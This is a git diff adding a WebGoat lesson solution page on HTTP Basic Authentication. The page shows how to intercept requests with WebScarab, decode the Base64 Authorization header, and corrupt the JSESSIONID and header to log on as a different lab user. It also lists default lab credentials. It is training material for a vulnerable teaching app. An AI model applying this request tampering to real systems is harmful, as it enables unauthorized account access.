+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="3074"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> Basic
+Authentication <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Basic
+Authentication is used to protect server side resources. The web server will send
+a 401 authentication request with the response for the requested resource. The
+client side browser will then prompt the user for a user name and password
+using a browser supplied dialog box. The browser will base64 encode the user
+name and password and send those credentials back to the web server. The web
+server will then validate the credentials and return the requested resource if
+the credentials are correct. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>These
+credentials are automatically resent for each page protected with this
+mechanism without requiring the user to enter their credentials again. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>For this
+lesson, your goal is to understand Basic Authentication and answer the
+questions below.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_1015" o:spid="_x0000_i1036" type="#_x0000_t75"
+ style='width:480pt;height:276pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/BasicAuthentication_files/image025.jpg" v:shapes="Picture_x0020_1015"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 13<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>To learn the
+name of the authentication header you must click “Submit” and intercept the
+request with WebScarab.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1016"
+ o:spid="_x0000_i1035" type="#_x0000_t75" style='width:459.75pt;height:362.25pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=613 height=483
+src="/WebGoat/lesson_solutions/BasicAuthentication_files/image026.jpg" v:shapes="Picture_x0020_1016"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Intercepted request</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The HTTP
+header that contains the Basic Authentication information is called
+“Authorization”. This value Z3Vlc3Q6Z3Vlc3Q= is Base64 encoded. You can decode
+this by using WebScarab – Tools – Transcoder.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1017"
+ o:spid="_x0000_i1034" type="#_x0000_t75" style='width:365.25pt;height:243.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=487 height=325
+src="/WebGoat/lesson_solutions/BasicAuthentication_files/image027.jpg" v:shapes="Picture_x0020_1017"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> WebScarabs Transcoder<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Click Base64
+decode. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1018"
+ o:spid="_x0000_i1033" type="#_x0000_t75" style='width:449.25pt;height:300pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image007.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=599 height=400
+src="/WebGoat/lesson_solutions/BasicAuthentication_files/image028.jpg" v:shapes="Picture_x0020_1018"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>4</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Decode value<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>These values must
+be used to complete the questions.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1019"
+ o:spid="_x0000_i1032" type="#_x0000_t75" style='width:480pt;height:276pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image009.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/BasicAuthentication_files/image029.jpg" v:shapes="Picture_x0020_1019"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>5</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Answers<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1020"
+ o:spid="_x0000_i1031" type="#_x0000_t75" style='width:480pt;height:276pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image011.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/BasicAuthentication_files/image030.jpg" v:shapes="Picture_x0020_1020"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>6</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Part 1 completed<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>For this
+lesson it is very important that you understand how the JSESSIONID cookie is
+used for session management and how the basic authorization header is used for
+authentication.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1021" o:spid="_x0000_i1030"
+ type="#_x0000_t75" style='width:435.75pt;height:343.5pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image013.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=581 height=458
+src="/WebGoat/lesson_solutions/BasicAuthentication_files/image031.jpg" v:shapes="Picture_x0020_1021"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>When WebGoat
+is able to retrieve a valid session you are automatically redirected to the
+lesson you are working on. When there is no valid session, WebGoat will create
+a new JSESSIONID and you will see the first lesson, HTTP Basics.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>When there is
+no session cookie, WebGoat will first verify if you already authenticated. If
+not, you will get a pop-up window from the browser that requests your user name
+and password (guest/guest). After the user credentials are validated, you will
+access the Start-page of WebGoat and WebGoat will create a new JSESSIONID for
+this session.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>To access
+WebGoat as the user basic, you need to corrupt the existing JSESSIONID and the
+Authorization header. You can do this in WebScarab. Intercept the request and
+delete a character from the JSESSIONID value and the Authorization header.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>WebGoat will
+require you to authenticate, so you now enter for the user name basic and for
+the password basic. This logs you on as the user basic. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Remember our
+JSESSIONID? This JSESSIONID is a non-persistent cookie which is set during our
+first visit. Every request from the browser to WebGoat will have this cookie
+value. Corrupting this value in the previous request will not change the cookie
+value stored in browser memory and that is the reason why the old JSESSIONID
+cookie is sent in every request.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1022"
+ o:spid="_x0000_i1029" type="#_x0000_t75" style='width:244.5pt;height:265.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image015.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=326 height=354
+src="/WebGoat/lesson_solutions/BasicAuthentication_files/image032.jpg" v:shapes="Picture_x0020_1022"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>7</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Basic Authentication<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>You clearly
+see that the JSESSIONID is the same like in the previous request, but the
+Authorization header now contains the Base 64 encoded value of basic:basic (you
+can decode this value in WebScarab – Tools – Transcoder).<o:p></o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1023"
+ o:spid="_x0000_i1028" type="#_x0000_t75" style='width:459.75pt;height:362.25pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image017.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=613 height=483
+src="/WebGoat/lesson_solutions/BasicAuthentication_files/image033.jpg" v:shapes="Picture_x0020_1023"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>8</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Logged on as user basic<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Because of the
+valid JSESSIONID, WebGoat retrieves the authenticated user via the server-side
+session object using getSession().getUser(). To make WebGoat believe that you
+are authenticated as basic, you need to corrupt the JSESSIONID, as shown in the
+screenshot below.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1024"
+ o:spid="_x0000_i1027" type="#_x0000_t75" style='width:448.5pt;height:353.25pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image019.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=598 height=471
+src="/WebGoat/lesson_solutions/BasicAuthentication_files/image034.jpg" v:shapes="Picture_x0020_1024"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>9</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Corrupt JSESSIONID<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1025"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image021.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/BasicAuthentication_files/image035.jpg" v:shapes="Picture_x0020_1025"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>10</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> Start page for user basic<span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Now you are
+redirected to the WebGoat start page. The JSESSIONID is changed and you lost all
+your green stars because the basic user hasn’t completed any lesson. Go to the
+lesson “Basic Authentication” to complete this lesson.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1026"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image023.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/BasicAuthentication_files/image036.jpg" v:shapes="Picture_x0020_1026"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>11</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> Lesson 13 Completed<span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/filelist.xml b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/filelist.xml
new file mode 100644
index 000000000..7f6641efb
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/filelist.xml
@@ -0,0 +1,30 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../BasicAuthentication.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image025.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image026.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image027.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image028.jpg"/>
+ <o:File HRef="image009.png"/>
+ <o:File HRef="image029.jpg"/>
+ <o:File HRef="image011.png"/>
+ <o:File HRef="image030.jpg"/>
+ <o:File HRef="image013.png"/>
+ <o:File HRef="image031.jpg"/>
+ <o:File HRef="image015.png"/>
+ <o:File HRef="image032.jpg"/>
+ <o:File HRef="image017.png"/>
+ <o:File HRef="image033.jpg"/>
+ <o:File HRef="image019.png"/>
+ <o:File HRef="image034.jpg"/>
+ <o:File HRef="image021.png"/>
+ <o:File HRef="image035.jpg"/>
+ <o:File HRef="image023.png"/>
+ <o:File HRef="image036.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image001.png b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image001.png
new file mode 100644
index 000000000..58cb8db49
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image003.png b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image003.png
new file mode 100644
index 000000000..e7380275b
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image005.png b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image005.png
new file mode 100644
index 000000000..6984b9e74
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image007.png b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image007.png
new file mode 100644
index 000000000..bebf90cda
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image009.png b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image009.png
new file mode 100644
index 000000000..917746bad
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image009.png differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image011.png b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image011.png
new file mode 100644
index 000000000..05f16f195
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BasicAuthentication_files/image011.png differ
